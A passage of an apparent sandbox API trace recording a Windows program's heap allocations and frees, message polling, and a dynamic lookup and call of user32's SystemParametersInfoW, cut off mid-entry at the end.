hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0252.545] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0252.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0252.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0252.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0252.546] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0252.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0252.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0252.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0252.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0252.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0252.547] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0252.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0252.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0252.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0252.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0252.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0252.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0252.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0252.548] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0252.548] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0252.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0252.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0252.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0252.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0252.549] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0252.549] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0252.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0252.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0252.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0252.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0252.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0252.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0252.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0252.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0252.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0252.550] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0252.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0252.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0252.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0252.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0252.550] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0252.551] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0252.551] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0252.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0252.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0252.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0252.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0252.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0252.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0252.552] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0252.552] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0252.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0252.552] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0252.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0252.553] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6f80 [0252.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6f80, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0252.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0252.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0252.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0252.555] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0252.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0252.555] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0252.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0252.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0252.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0252.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0252.555] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0252.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0252.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0252.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0252.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0252.556] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0252.557] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0252.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866a20 [0252.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0252.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0252.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0252.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0252.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0252.685] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0252.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0252.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0252.688] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0252.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0252.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0252.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0252.688] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7a0 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0252.689] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0252.689] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0252.689] FreeLibrary (hLibModule=0x76240000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0252.690] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0252.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0252.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0252.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0252.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865268 [0252.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0252.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0252.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866a20 | out: hHeap=0x2af0000) returned 1 [0252.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0252.691] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0252.691] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.691] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0252.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0252.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0252.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0252.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0252.692] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0252.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0252.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0252.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0252.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0252.692] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0252.693] HeapFree (in: 